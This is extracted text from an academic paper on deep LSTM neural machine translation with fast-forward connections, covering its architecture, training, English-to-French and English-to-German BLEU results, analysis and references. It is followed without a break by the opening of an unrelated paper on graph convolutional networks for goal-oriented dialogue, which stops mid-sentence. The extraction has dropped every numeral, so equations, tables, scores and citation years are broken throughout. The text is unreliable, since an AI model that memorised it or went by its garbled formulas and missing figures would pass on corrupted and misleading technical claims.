source sequence. we have two instantiations of this topology: deep-ed and deep-att, which corre- spond to the extension of the encoder-decoder net- work and the attention network respectively. our main innovation is the novel scheme for connecting adjacent recurrent layers. we will start with the ba- sic rnn model for the sake of clarity. recurrent layer: when an input sequence {x , . . . ,xm} is given to a recurrent layer, the out- put ht at each time step t can be computed as (see fig. (a)) ht = σ(wfxt + wrht− ) = rnn (wfxt,ht− ) = rnn (ft,ht− ), ( ) where the bias parameter is not included for simplic- ity. we use a red circle and a blue empty square to denote an input and a hidden state. a blue square with a “-” denotes the previous hidden state. a dot- ted line means that the hidden state is used recur- rently. this computation can be equivalently split into two consecutive steps: • feed-forward computation: ft = wfxt. left part in fig. (b). “f” block. • recurrent computation: rnn (ft,ht− ). right part and the sum operation (+) followed by activation in fig. (b). “r” block. for a deep topology with stacked recurrent layers, the input of each block “f” at recurrent layer k (de- noted by fk) is usually the output of block “r” at its previous recurrent layer k − (denoted by hk− ). in our work, we add fast-forward connections (f-f connections) which connect two feed-forward com- putation blocks “f” of adjacent recurrent layers. it means that each block “f” at recurrent layer k takes both the outputs of block “f” and block “r” at its pre- vious layer as input (fig. (c)). f-f connections are denoted by dashed red lines in fig. (c) and fig. . the path of f-f connections contains neither non- linear activations nor recurrent computation. it pro- vides a fast path for information to propagate, so we call this path fast-forward connections. t t t - - - - - - - -(a) (b) (c) f-f wf wr ht ht- x ht wf wr x ht- x ht- wf wf ht ht ht- f t f t f t block f block r figure : rnn models. the recurrent use of a hidden state is denoted by dotted lines. a “-” mark denotes the hidden value of the previous time step. (a): basic rnn. (b): basic rnn with intermediate computational state and the sum operation (+) followed by activation. it consists of block “f” and block “r”, and is equivalent to (a). (c):two stacked rnn layers with f-f connections denoted by dashed red lines. additionally, in order to learn more temporal dependencies, the sequences can be processed in different directions at each pair of adjacent recurrent layers. this is quantitatively expressed in eq. : fkt = w k f · [fk− t ,hk− t ], k > fkt = w k f xt k = hkt = rnn k (fkt ,h k t+(− )k) ( ) the opposite directions are marked by the direction term (− )k. at the first recurrent layer, the block “f” takes xt as the input. [ , ] denotes the concatenation of vectors. this is shown in fig. (c). the two changes are summarized here: • we add a connection between fkt and fk− t . without fk− t , our model will be reduced to the traditional stacked model. • we alternate the rnn direction at different lay- ers k with the direction term (− )k. if we fix the direction term to − , all layers work in the forward direction. lstm layer: in our experiments, instead of an rnn, a specific type of recurrent layer called lstm (hochreiter and schmidhuber, ; graves et al., ) is used. the lstm is structurally more complex than the basic rnn in eq. . we de- fine the computation of the lstm as a function which maps the input f and its state-output pair (h,s) at the previous time step to the current state- output pair. the exact computations for (ht,st) = lstm(ft,ht− ,st− ) are the following: [z,zρ,zφ,zπ] = ft + wrht− st = σi(z)◦σg(zρ + st− ◦θρ) + σg(zφ + st− ◦θφ)◦st− ht = σo(st)◦σg(zπ + st ◦θπ) ( ) where [z,zρ,zφ,zπ] is the concatenation of four vec- tors of equal size, ◦ means element-wise multiplica- tion, σi is the input activation function, σo is the out- put activation function, σg is the activation function for gates, and wr, θρ, θφ, and θπ are the parame- ters of the lstm. it is slightly different from the standard notation in that we do not have a matrix to multiply with the input f in our notation. with this notation, we can write down the com- putations for our deep bi-directional lstm model with f-f connections: fkt = w k f · [fk− t ,hk− t ], k > fkt = w k f xt, k = (hkt ,s k t ) = lstm k ( fkt ,h k t+(− )k,s k t+(− )k ) ( ) where xt is the input to the deep bi-directional lstm model. for the encoder, xt is the embedding of the tth word in the source sentence. for the de- coder xt is the concatenation of the embedding of the tth word in the target sentence and the encoder representation for step t. in our final model two additional operations are used with eq. , which is shown in eq. . half(f) denotes the first half of the elements of f, and dr(h) is the dropout operation (hinton et al., ) which randomly sets an element of h to zero with a cer- tain probability. the use of half(·) is to reduce the parameter size and does not affect the perfor- mance. we observed noticeable performance degra- dation when using only the first third of the elements of “f”. fkt = w k f · [half(fk− t ),dr(hk− t )], k > ( ) with the f-f connections, we build a fast channel to propagate the gradients in the deep topology. f-f connections can accelerate the model convergence and while improving the performance. a similar idea was also used in (he et al., ; zhou and xu, ). encoder: the lstm layers are stacked following eq. . we call this type of encoder interleaved bi- directional encoder. in addition, there are two sim- ilar columns (a and a ) in the encoder part. each column consists of ne stacked lstm layers. there is no connection between the two columns. the first layers of the two columns process the word repre- sentations of the source sequence in different direc- tions. at the last lstm layers, there are two groups of vectors representing the source sequence. the group size is the same as the length of the input se- quence. interface: prior encoder-decoder models and atten- tion models are different in their method of extract- ing the representations of the source sequences. in our work, as a consequence of the introduced f-f connections, we have output vectors (hnet and f ne t of both columns). the representations are modified for both deep-ed and deep-att. for deep-ed, et is static and consists of four parts. : the last time step output hnem of the first column. : max-operation max(·) of hnet at all time steps of the second column, denoted by max(hne,a t ). max(·) denotes obtaining the maximal value for each dimension over t. : max(f ne,a t ). : max(f ne,a t ). the max-operation and last time step state extraction provide compli- mentary information but do not affect the perfor- mance much. et is used as the final representation ct. for deep-att, we do not need the above two op- erations. we only concatenate the output vectors at each time step to obtain et, and a soft attention mechanism (bahdanau et al., ) is used to calcu- late the final representation ct from et. et is summa- rized as: deep-ed: et [hne,a m ,max(h ne,a t ),max(f ne,a t ),max(f ne,a t )] deep-att: et [h ne,a t ,h ne,a t ,f ne,a t ,f ne,a t ] ( ) note that the vector dimensionality of f is four times larger than that of h (see eq. ). ct is summarized as: deep-ed: ct = et, (const) deep-att: ct = m∑ t′= αt,t′wpet′ ( ) αt,t′ is the normalized attention weight computed by: αt,t′ = exp(a(wpet′,h ,dec t− ))∑ t′′ exp(a(wpet′′,h ,dec t− )) ( ) h ,dec t− is the first hidden layer output in the decoding part. a(·) is an alignment model described in (bah- danau et al., ). for deep-att, in order to re- duce the memory cost, we linearly project (with wp) the concatenated vector et to a vector with / di- mension size, denoted by the (fully connected) block “fc” in fig. . decoder: the decoder follows eq. and eq. with fixed direction term − . at the first layer, we use the following xt: xt = [ct,yt− ] ( ) yt− is the target word embedding at the previous time step and y is zero. there is a single column of nd stacked lstm layers. we also use the f-f connections like those in the encoder and all layers are in the forward direction. note that at the last lstm layer, we only use ht to make the prediction with a softmax layer. although the network is deep, the training tech- nique is straightforward. we will describe this in the next part. . training technique we take the parallel data as the only input without using any monolingual data for either word repre- sentation pre-training or language modeling. be- cause of the deep bi-directional structure, we do not need to reverse the sequence order as sutskever et al. ( ). the deep topology brings difficulties for the model training, especially when first order methods such as stochastic gradient descent (sgd) (lecun et al., ) are used. the parameters should be properly initialized and the converging process can + i it . r r r r it .i r r r r r r r r r r r r … … … … … k = .. . en co di ng ve ct or s je . r r r … … … … … … predicted w ords e  e  e  e  e  e  e  e  e  e  e  e  e  e  e  e  d d d i i a   ia <s> r d fc enjoy enjoy l'app- récie ff ff ff ff ff ff ff ff f f ff encoder interface decoder ie  ie  r f- f co nn ec tio n f- f co nn ec tio n f- f co nn ec tio n c c c c ' ie k = ... k = … … … … … figure : the network. it includes three parts from left to right: encoder part (p-e), interface (p-i) and decoder part (p-d). we only show the topology of deep-att as an example. “f” and “r” blocks correspond to the feed-forward part and the subsequent lstm computation. the f-f connections are denoted by dashed red lines. be slow. we tried several optimization techniques such as adadelta (zeiler, ), rmsprop (tiele- man and hinton, ) and adam (kingma and ba, ). we found that all of them were able to speed up the process a lot compared to simple sgd while no significant performance difference was ob- served among them. in this work, we chose adam for model training and do not present a detailed com- parison with other optimization methods. dropout (hinton et al., ) is also used to avoid over-fitting. it is utilized on the lstm nodes hkt (see eq. ) with a ratio of pd for both the encoder and decoder. during the whole model training process, we keep all hyper parameters fixed without any intermediate interruption. the hyper parameters are selected ac- cording to the performance on the development set. for such a deep and large network, it is not easy to determine the tuning strategy and this will be con- sidered in future work. . generation we use the common left-to-right beam-search method for sequence generation. at each time step t, the word yt can be predicted by: ŷt = arg max y p(y|ŷ :t− ,x;θ) ( ) where ŷt is the predicted target word. ŷ :t− is the generated sequence from time step to t − . we keep nb best candidates according to eq. at each time step, until the end of sentence mark is gener- ated. the hypotheses are ranked by the total like- lihood of the generated sequence, although normal- ized likelihood is used in some works (jean et al., ). experiments we evaluate our method mainly on the widely used wmt’ english-to-french translation task. in or- der to validate our model on more difficult lan- guage pairs, we also provide results on the wmt’ english-to-german translation task. our models are implemented in the paddle (parallel distributed deep learning) platform. . data sets for both tasks, we use the full wmt’ parallel cor- pus as our training data. the detailed data sets are listed below: • english-to-french: europarl v , common crawl, un, news commentary, gigaword • english-to-german: europarl v , common crawl, news commentary in total, the english-to-french corpus includes million sentence pairs, and the english-to-german corpus includes . million sentence pairs. the news-test- and news-test- are concate- nated as our development set, and the news-test- is the test set. our data partition is consistent with previous works on nmt (luong et al., ; jean et al., ) to ensure fair comparison. for the source language, we select the most fre- quent k words as the input vocabulary. for the target language we select the most frequent k french words and the most frequent k german words as the output vocabulary. the full vocab- ulary of the german corpus is larger (jean et al., ), so we select more german words to build the target vocabulary. out-of-vocabulary words are re- placed with the unknown symbol 〈unk〉. for com- plete comparison to previous work on the english- to-french task, we also show the results with a smaller vocabulary of k input words and k out- put words on the sub train set with selected m par- allel sequences (schwenk, ; sutskever et al., ; cho et al., ). . model settings we have two models as described above, named deep-ed and deep-att. both models have exactly the same configuration and layer size except the in- terface part p-i. we use dimensional word embeddings for both the source and target languages. all lstm layers, including the ×ne layers in the encoder and the nd layers in the decoder, have memory cells. the output layer size is the same as the size of the target vocabulary. the dimension of ct is and for deep-ed and deep-att respectively. for each lstm layer, the activation functions for gates, inputs and outputs are sigmoid, tanh, and tanh re- spectively. our network is narrow on word embeddings and lstm layers. note that in previous work (sutskever et al., ; bahdanau et al., ), dimensional word embeddings and di- mensional lstm layers are used. we also tried larger scale models but did not obtain further im- provements. . optimization note that each lstm layer includes two parts as described in eq. , feed-forward computation and recurrent computation. since there are non-linear activations in the recurrent computation, a larger learning rate lr = × − is used, while for the feed-forward computation a smaller learning rate lf = × − is used. word embeddings and the softmax layer also use this learning rate lf . we refer all the parameters not used for recurrent computa- tion as non-recurrent part of the model. because of the large model size, we use strong l regularization to constrain the parameter matrix v in the following way: v ← v − l · (g + r ·v) ( ) here r is the regularization strength, l is the corre- sponding learning rate, g stands for the gradients of v. the two embedding layers are not regularized. all the other layers have the same r = . the parameters of the recurrent computation part are initialized to zero. all non-recurrent parts are randomly initialized with zero mean and standard deviation of . . a detailed guide for setting hyper- parameters can be found in (bengio, ). the dropout ratio pd is . . in each batch, there are ∼ sequences in our work. the exact number depends on the sequence lengths and model size. we also find that larger batch size results in better convergence although the improvement is not large. however, the largest batch size is constrained by the gpu memory. we use ∼ gpu machines (each has k gpu cards) running for days to train the full model with parallelization at the data batch level. it takes nearly . days for each pass. one thing we want to emphasize here is that our deep model is not sensitive to these settings. small variation does not affect the final performance. . results we evaluate the same way as previous nmt works (sutskever et al., ; luong et al., ; jean et al., ). all reported bleu scores are computed with the multi-bleu.perl script which is also used in the above works. the results are for tokenized and case sensitive evaluation. . . single models english-to-french: first we list our single model results on the english-to-french task in tab. . in the first block we show the results with the full https://github.com/moses-smt/ mosesdecoder/blob/master/scripts/generic/ multi-bleu.perl corpus. the previous best single nmt encoder- decoder model (enc-dec) with six layers achieves bleu= . (luong et al., ). from deep-ed, we obtain the bleu score of . , which outper- forms enc-dec model by . bleu points. this result is even better than the ensemble result of eight enc-dec models, which is . (luong et al., ). this shows that, in addition to the convolutional lay- ers for computer vision, deep topologies can also work for lstm layers. for deep-att, the perfor- mance is further improved to . . we also list the previous state-of-the-art performance from a con- ventional smt system (durrani et al., ) with the bleu of . . this is the first time that a single nmt model trained in an end-to-end form beats the best conventional system on this task. we also show the results on the smaller data set with m sentence pairs and k vocabulary in the second block. the two attention mod- els, rnnsearch (bahdanau et al., ) and rnnsearch-lv (jean et al., ), achieve bleu scores of . and . respectively. note that rnnsearch-lv uses a large output vocabulary of k words based on the standard attention model rnnsearch. we obtain bleu= . which outper- forms its corresponding shallow model rnnsearch by . bleu points. the smt result from (schwenk, ) is also listed and falls behind our model by . bleu points. methods data voc bleu enc-dec (luong, ) m k . smt (durrani, ) m full . deep-ed (ours) m k . deep-att (ours) m k . rnnsearch (bahdanau, ) m k . rnnsearch-lv (jean, ) m k . smt (schwenk, ) m full . deep-att (ours) m k . table : english-to-french task: bleu scores of single neural models. we also list the conventional smt system for comparison. moreover, during the generation process, we ob- tained the best bleu score with beam size = (when the beam size is , there is only a . dif- ference in bleu score). this is different from other works listed in tab. , where the beam size is (jean et al., ; sutskever et al., ). we at- tribute this difference to the improved model per- formance, where the ground truth generally exists in the top hypothesis. consequently, with the much smaller beam size, the generation efficiency is sig- nificantly improved. next we list the effect of the novel f-f connec- tions in our deep-att model of shallow topology in tab. . when ne = and nd = , the bleu scores are . without f-f and . with f-f. note that the model without f-f is exactly the standard attention model (bahdanau et al., ). since there is only a single layer, the use of f-f connections means that at the interface part we include ft into the represen- tation (see eq. ). we find f-f connections bring an improvement of . in bleu. after we increase our model depth to ne = and nd = , the improve- ment is enlarged to . . when the model is trained with larger depth without f-f connections, we find that the parameter exploding problem (bengio et al., ) happens so frequently that we could not finish training. this suggests that f-f connections provide a fast way for gradient propagation. models f-f ne nd bleu deep-att no . deep-att yes . deep-att no . deep-att yes . table : the effect of f-f. we list the bleu scores of deep-att with and without f-f. because of the param- eter exploding problem, we can not list the model per- formance of larger depth without f-f. for ne = and nd = , f-f connections only contribute to the represen- tation at interface part (see eq. ). removing f-f connections also reduces the cor- responding model size. in order to figure out the effect of f-f comparing models with the same pa- rameter size, we increase the lstm layer width of deep-att without f-f. in tab. we show that, after using a two times larger lstm layer width of , we can only obtain a bleu score of . , which is still worse than the corresponding deep-att with f-f. we also notice that the interleaved bi-directional encoder starts to work when the encoder depth is larger than . the effect of the interleaved bi- directional encoder is shown in tab. . for our largest model with ne = and nd = , we compared models f-f ne nd width bleu deep-att no . deep-att no . deep-att yes . table : bleu scores with different lstm layer width in deep-att. after using two times larger lstm layer width of , we can only obtain bleu score of . . it is still behind the corresponding deep-att with f-f. the bleu scores of the interleaved bi-directional encoder and the uni-directional encoder (where all lstm layers work in forward direction). we find there is a gap of about . points between these two encoders for both deep-att and deep-ed. models encoder ne nd bleu deep-att bi . deep-att uni . deep-ed bi . deep-ed uni . table : the effect of the interleaved bi-directional en- coder. we list the bleu scores of our largest deep-att and deep-ed models. the encoder term bi denotes that the interleaved bi-directional encoder is used. uni de- notes a model where all lstm layers work in forward direction. next we look into the effect of model depth. in tab. , starting from ne = and nd = and gradu- ally increasing the model depth, we significantly in- crease bleu scores. with ne = and nd = , the best score for deep-att is . . we tried to increase the lstm width based on this, but obtained little improvement. as we stated in sec. , the complexity of the encoder and decoder, which is related to the model depth, is more important than the model size. we also tried a larger depth, but the results started to get worse. with our topology and training tech- nique, ne = and nd = is the best depth we can achieve. the last line in tab. shows the bleu score of . of our deepest model, where only one encod- ing column (col = ) is used. we find a . bleu points degradation with a single encoding column. note that the uni-directional models in tab. with uni-direction still have two encoding columns. in order to find out whether this is caused by the de- creased parameter size, we test a wider model with models f-f ne nd col bleu deep-att yes . deep-att yes . deep-att yes . deep-att yes . deep-att yes . table : bleu score of deep-att with different model depth. with ne = and nd = , f-f connections only contribute to the representation at interface part where ft is included (see eq. ). memory blocks for the lstm layers. it is shown in tab. that there is a minor improvement of only . . we attribute this to the complementary in- formation provided by the double encoding column. models f-f ne nd col width bleu deep-att yes . deep-att yes . deep-att yes . table : comparison of encoders with different number of columns and lstm layer width. english-to-german: we also validate our deep topology on the english-to-german task. the english-to-german task is considered a relatively more difficult task, because of the lower similarity between these two languages. since the german vo- cabulary is much larger than the french vocabulary, we select k most frequent words as the target vo- cabulary. all the other hyper parameters are exactly the same as those in the english-to-french task. we list our single model deep-att performance in tab. . our single model result with bleu= . is similar to the conventional smt result of . (buck et al., ). we also outperform the shallow at- tention models as shown in the first two lines in tab. . all the results are consistent with those in the english-to-french task. . . post processing two post processing techniques are used to im- prove the performance further on the english-to- french task. first, three deep-att models are built for ensem- ble results. they are initialized with different ran- dom parameters; in addition, the training corpus methods data voc bleu rnnsearch (jean, ) . m k . rnnsearch-lv (jean, ) . m k . smt (buck, ) . m full . deep-att (ours) . m k . table : english-to-german task: bleu scores of single neural models. we also list the conventional smt system for comparison. for these models is shuffled with different random seeds. we sum over the predicted probabilities of the target words and normalize the final distribution to generate the next word. it is shown in tab. that the model ensemble can improve the performance further to . . in luong et al. ( ) and jean et al. ( ) there are eight models for the best scores, but we only use three models and we do not obtain further gain from more models. methods model data voc bleu deep-ed single m k . deep-att single m k . deep-att single+posunk m k . deep-att ensemble m k . deep-att ensemble+posunk m k . smt durrani, m full . enc-dec ensemble+posunk m k . table : bleu scores of different models. the first two blocks are our results of two single models and mod- els with post processing. in the last block we list two baselines of the best conventional smt system and nmt system. second, we recover the unknown words in the generated sequences with the positional unknown (posunk) model introduced in (luong et al., ). the full parallel corpus is used to obtain the word mappings (liang et al., ). we find this method provides an additional . bleu points, which is consistent with the conclusion in luong et al. ( ). we obtain the new bleu score of . with a single deep-att model. for the ensemble models of deep-att, the bleu score rises to . . in the last two lines, we list the conventional smt model (durrani et al., ) and the previous best neural models based system enc-dec (luong et al., ) for comparison. we find our best score outperforms the previous best score by nearly points. . analysis . . length on the english-to-french task, we analyze the effect of the source sentence length on our mod- els as shown in fig. . here we show five curves: our deep-att single model, our deep-att ensemble model, our deep-ed model, a previously proposed enc-dec model with four layers (sutskever et al., ) and an smt model (durrani et al., ). we find our deep-att model works better than the sentences by length b l e u deep−att single model deep−att ensemble models deep−ed single model enc−dec layers (sutskever, ) smt (durrani, ) figure : bleu scores vs. source sequence length. five lines are our deep-att single model, deep-att ensem- ble model, our deep-ed model, previous enc-dec model with four layers and smt model. previous two models (enc-dec and smt) on nearly all sentence lengths. it is also shown that for very long sequences with length over words, the per- formance of our deep-att does not degrade, when compared to another nmt model enc-dec. our deep-ed also has much better performance than the shallow enc-dec model on nearly all lengths, al- though for long sequences it degrades and starts to fall behind deep-att. . . unknown words next we look into the detail of the effect of un- known words on the english-to-french task. we select the subset without unknown words on target sentences from the original test set. there are such sentences ( . %). we compute the bleu scores on this subset and the results are shown in tab. . we also list the results from smt model (durrani et al., ) as a comparison. we find that the bleu score of deep-att on this subset rises to . , which has a gap of . with model test set ratio(%) bleu deep-att full . . ensemble full . . smt(durrani) full . . deep-att subset . . ensemble subset . . smt(durrani) subset . . table : bleu scores of the subset of the test set without considering unknown words. . . . . . . . . . . . te st t r a i n n e = n d = n e = n d = n e = n d = figure : token error rate on train set vs. test set. square: deep-att (ne = , nd = ). circle: deep-att (ne = , nd = ). triagle: deep-att (ne = , nd = ). the score . on the full test set. on this sub- set, the smt model achieves . , which is simi- lar to its score . on the full test set. this sug- gests that the difficulty on this subset is not much different from that on the full set. we therefore at- tribute the larger gap for deep-att to the existence of unknown words. we also compute the bleu score on the subset of the ensemble model and ob- tain . . as a reference related to human perfor- mance, in sutskever et al. ( ), it has been tested that the bleu score of oracle re-scoring the lium -best results (schwenk, ) is . . . over-fitting deep models have more parameters, and thus have a stronger ability to fit the large data set. however, our experimental results suggest that deep models are less prone to the problem of over-fitting. in fig. , we show three results from models with a different depth on the english-to-french task. these three models are evaluated by token error rate, which is defined as the ratio of incorrectly predicted words in the whole target sequence with correct his- torical input. the curve with square marks corre- sponds to deep-att with ne = and nd = . the curve with circle marks corresponds to ne = and nd = . the curve with triangle marks corresponds to ne = and nd = . we find that the deep model has better performance on the test set when the token error rate is the same as that of the shallow models on the training set. this shows that, with decreased token error rate, the deep model is more advanta- geous in avoiding the over-fitting phenomenon. we only plot the early training stage curves because, during the late training stage, the curves are not smooth. conclusion with the introduction of fast-forward connections to the deep lstm network, we build a fast path with neither non-linear transformations nor recur- rent computation to propagate the gradients from the top to the deep bottom. on this path, gradients de- cay much slower compared to the standard deep net- work. this enables us to build the deep topology of nmt models. we trained nmt models with depth of in- cluding lstm layers and evaluated them mainly on the wmt’ english-to-french translation task. this is the deepest topology that has been in- vestigated in the nmt area on this task. we showed that our deep-att exhibits . bleu points improvement over the previous best single model, achieving a . bleu score. this single end-to- end nmt model outperforms the best conventional smt system (durrani et al., ) and achieves a state-of-the-art performance. after utilizing un- known word processing and model ensemble of three models, we obtained a bleu score of . , an improvement of . bleu points over the pre- vious best result. when evaluated on the subset of the test corpus without unknown words, our model achieves . . our model is also validated on the more difficult english-to-german task. our model is also efficient in sequence genera- tion. the best results from both a single model and model ensemble are obtained with a beam size of , much smaller than previous nmt systems where beam size is about (jean et al., ; sutskever et al., ). from our analysis, we find that deep models are more advantageous for learning for long sequences and that the deep topology is resistant to the over-fitting problem. we tried deeper models and did not obtain further improvements with our current topology and train- ing techniques. however, the depth of is not very deep compared to the models in computer vi- sion (he et al., ). we believe we can benefit from deeper models, with new designs of topologies and training techniques, which remain as our future work. references dzmitry bahdanau, kyunghyun cho, and yoshua ben- gio. . neural machine translation by jointly learning to align and translate. in proceedings of in- ternational conference on learning representations. yoshua bengio, patrice simard, and paolo frasconi. . learning long-term dependencies with gradi- ent descent is difficult. ieee transactions on neural networks, ( ): – . yoshua bengio, . practical recommendations for gradient-based training of deep architectures, pages – . springer berlin heidelberg, berlin, heidel- berg. christian buck, kenneth heafield, and bas van ooyen. . n-gram counts and language models from the common crawl. in proceedings of the language re- sources and evaluation conference. kyunghyun cho, bart van merrienboer, caglar gulcehre, fethi bougares, holger schwenk, and yoshua ben- gio. . learning phrase representations using rnn encoder-decoder for statistical machine transla- tion. in proceedings of the empiricial methods in nat- ural language processing. nadir durrani, barry haddow, philipp koehn, and ken- neth heafield. . edinburgh’s phrase-based ma- chine translation systems for wmt- . in proceed- ings of the ninth workshop on statistical machine translation. mikel l. forcada and ramón p. ñeco. . recur- sive hetero-associative memories for translation. in biological and artificial computation: from neuro- science to technology, berlin, heidelberg. springer berlin heidelberg. alex graves, marcus liwicki, santiago fernandez, ro- man bertolami, horst bunke, and jürgen schmid- huber. . a novel connectionist system for un- constrained handwriting recognition. ieee transac- tions on pattern analysis and machine intelligence, ( ): – . kaiming he, xiangyu zhang, shaoqing ren, and jian sun. . deep residual learning for image recog- nition. in ieee conference on computer vision and pattern recognition. karl moritz hermann, tomáš kočiský, edward grefen- stette, lasse espeholt, will kay, mustafa suleyman, and phil blunsom. . teaching machines to read and comprehend. in advances in neural information processing systems. geoffrey e. hinton, nitish srivastava, alex krizhevsky, ilya sutskever, and ruslan salakhutdinov. . im- proving neural networks by preventing co-adaptation of feature detectors. arxiv: . . sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – . sébastien jean, kyunghyun cho, roland memisevic, and yoshua bengio. . on using very large target vo- cabulary for neural machine translation. in proceed- ings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natural language processing. nal kalchbrenner and phil blunsom. . recurrent continuous translation models. in proceedings of the empirical methods in natural language processing. nal kalchbrenner, ivo danihelka, and alex graves. . grid long short-term memory. in proceedings of international conference on learning representa- tions. diederik p. kingma and jimmy lei ba. . adam: a method for stochastic optimization. in proceedings of international conference on learning representa- tions. p. koehn, f. j. och, and d. marcu. . statistical phrase-based translation. in proceedings of the north american chapter of the association for computa- tional linguistics on human language technology. yann lecun, léon bottou, yoshua bengio, and patrick haffner. . gradient-based learning applied to document recognition. proceedings of the ieee, ( ): – . percy liang, ben taskar, and dan klein. . align- ment by agreement. in proceedings of the north american chapter of the association of computa- tional linguistics on human language technology. thang luong, ilya sutskever, quoc le, oriol vinyals, and wojciech zaremba. . addressing the rare word problem in neural machine translation. in pro- ceedings of the rd annual meeting of the associa- tion for computational linguistics and the th inter- national joint conference on natural language pro- cessing. junhua mao, wei xu, yi yang, jiang wang, zhiheng huang, and alan l. yuille. . deep captioning with multimodal recurrent neural networks (m-rnn). in proceedings of international conference on learn- ing representations. holger schwenk. . http://www-lium.univ- lemans.fr/∼schwenk/cslm joint paper [online; ac- cessed -september- ]. university le mans. rupesh kumar srivastava, klaus greff, and jürgen schmidhuber. . highway networks. in proceed- ings of the nd international conference on machine learning, deep learning workshop. ilya sutskever, oriol vinyals, and quoc le. . se- quence to sequence learning with neural networks. in advances in neural information processing systems. christian szegedy, wei liu, yangqing jia, pierre ser- manet, scott reed, dragomir anguelov, dumitru er- han, vincent vanhoucke, and andrew rabinovich. . going deeper with convolutions. in ieee con- ference on computer vision and pattern recognition. tijmen tieleman and geoffrey hinton. . lecture . -rmsprop: divide the gradient by a running aver- age of its recent magnitude. coursera: neural net- works for machine learning, . oriol vinyals and quoc le. . a neural conver- sational model. in proceedings of the nd interna- tional conference on machine learning, deep learn- ing workshop. kaisheng yao, trevor cohn, katerina vylomova, kevin duh, and chris dyer. . depth-gated lstm. arxiv: . . yang yu, wei zhang, chung-wei hang, bing xiang, and bowen zhou. . empirical study on deep learning models for qa. arxiv: . . matthew d. zeiler. . adadelta: an adaptive learning rate method. arxiv: . . jie zhou and wei xu. . end-to-end learning of se- mantic role labeling using recurrent neural networks. in proceedings of the rd annual meeting of the as- sociation for computational linguistics and the th international joint conference on natural language processing. under review as a conference paper at iclr graph convolutional network with sequen- tial attention for goal-oriented dialogue systems anonymous authors paper under double-blind review abstract domain specific goal-oriented dialogue systems typically require modeling three types of inputs, viz., (i) the knowledge-base associated with the domain, (ii) the history of the conversation, which is a sequence of utterances and (iii) the cur- rent utterance for which the response needs to be generated. while modeling these inputs, current state-of-the-art models such as mem seq typically ignore the rich structure inherent in the knowledge graph and the sentences in the con- versation context. inspired by the recent success of structure-aware graph con- volutional networks (gcns) for various nlp tasks such as machine translation, semantic role labeling and document dating, we propose a memory augmented gcn for goal-oriented dialogues. our model exploits (i) the entity relation graph in a knowledge-base and (ii) the dependency graph associated with an utterance to compute richer representations for words and entities. further, we take cog- nizance of the fact that in certain situations, such as, when the conversation is in a code-mixed language, dependency parsers may not be available. we show that in such situations we could use the global word co-occurrence graph and use it to enrich the representations of utterances. we experiment with the modified dstc dataset and its recently released code-mixed versions in four languages and show that our method outperforms existing state-of-the-art methods, using a wide range of evaluation metrics. introduction goal-oriented dialogue systems which can assist humans in various day-to-day activities have widespread applications in several domains such as e-commerce, entertainment, healthcare, etc. for example, such systems can help humans in scheduling medical appointments, reserving restaurants, booking tickets, etc.. from a modeling perspective, one clear advantage of dealing with domain spe- cific goal-oriented dialogues is that the vocabulary is typically limited, the utterances largely follow a fixed set of templates and there is an associated domain knowledge which can be exploited. more specifically, there is some structure associated with the utterances as well as the knowledge base. more formally, the task here is to generate the next response given (i) the previous utterances in the conversation history (ii) the current user utterance (known as the query) and (iii) the entities and relationships in the associated knowledge base. current state-of-the-art methods (seo et al., ; eric & manning, ; madotto et al., ) typically use variants of recurrent neural network (elman, ) to encode the history and current utterance and an external memory network to store the entities in the knowledge base. the encodings of the utterances and memory elements are then suitably combined using an attention network and fed to the decoder to generate the response, one word at a time. however, these methods do not exploit the structure in the knowledge base as defined by entity-entity relations and the structure in the utterances as defined by a dependency parse. such structural information can be exploited to improve the performance of the system as demonstrated by recent works on syntax-aware neural machine translation (eriguchi et al., ; bastings et al., ; chen et al., ), semantic role labeling (marcheggiani & titov, ) and document dating under review as a conference paper at iclr (vashishth et al., ) which use gcns (defferrard et al., ; duvenaud et al., ; kipf & welling, ) to exploit sentence structure. in this work, we propose to use such graph structures for goal-oriented dialogues. in particular, we compute the dependency parse tree for each utterance in the conversation and use a gcn to capture the interactions between words. this allows us to capture interactions between distant words in the sentence as long as they are connected by a dependency relation. we also use gcns to encode the entities of the kb where the entities are treated as nodes and the relations as edges of the graph. once we have a richer structure aware representation for the utterances and the entities, we use a sequential attention mechanism to compute an aggregated context representation from the gcn node vectors of the query, history and entities. further, we note that in certain situations, such as, when the conversation is in a code-mixed language or a language for which parsers are not available then it may not be possible to construct a dependency parse for the utterances. to overcome this, we construct a co-occurrence matrix from the entire corpus and use this matrix to impose a graph structure on the utterances. more specifically, we add an edge between two words in a sentence if they co-occur frequently in the corpus. our experiments suggest that this simple strategy acts as a reasonable substitute for dependency parse trees. we perform experiments with the modified dstc (bordes et al., ) dataset which contains goal-oriented conversations for reserving restaurants. we also use its recently released code-mixed versions (banerjee et al., ) which contain code-mixed conversations in four different languages, viz., hindi, bengali, gujarati and tamil. we compare with recent state-of-the-art methods and show that on average the proposed model gives an improvement of . bleu points and rouge points. our contributions can be summarized as follows: (i) we use gcns to incorporate structural in- formation for encoding query, history and kb entities in goal-oriented dialogues (ii) we use a se- quential attention mechanism to obtain query aware and history aware context representations (iii) we leverage co-occurrence frequencies and ppmi (positive-pointwise mutual information) values to construct contextual graphs for code-mixed utterances and (iv) we show that the proposed model obtains state-of-the-art results on the modified dstc dataset and its recently released code-mixed versions. related work in this section we review the previous work in goal-oriented dialogue systems and describe the introduction of gcns in nlp. goal-oriented dialogue system : initial goal-oriented dialogue systems (young, ; williams & young, ) were based on dialogue state tracking (williams et al., ; henderson et al., a;b) and included pipelined modules for natural language understanding, dialogue state track- ing, policy management and natural language generation. wen et al. ( ) used neural networks for these intermediate modules but still lacked absolute end-to-end trainability. such pipelined modules were restricted by the fixed slot-structure assumptions on the dialogue state and required per-module based labelling. to mitigate this problem bordes et al. ( ) released a version of goal-oriented dialogue dataset that focuses on the development of end-to-end neural models. such models need to reason over the associated kb triples and generate responses directly from the utterances without any additional annotations. for example, bordes et al. ( ) proposed a memory network (sukhbaatar et al., ) based model to match the response candidates with the multi-hop attention weighted representation of the conversation history and the kb triples in memory. liu & perez ( ) further added highway (srivastava et al., ) and residual connections (he et al., ) to the memory network in order to regulate the access to the memory blocks. seo et al. ( ) developed a variant of rnn cell which computes a refined representation of the query over multiple iterations before querying the memory. however, all these approaches retrieve the response from a set of candidate responses and such a candidate set is not easy to obtain in any new domain of interest. to account for this, eric & manning ( ); zhao et al. ( ) adapted rnn based encoder-decoder models to generate appropriate responses instead of retrieving them from a candidate set. eric et 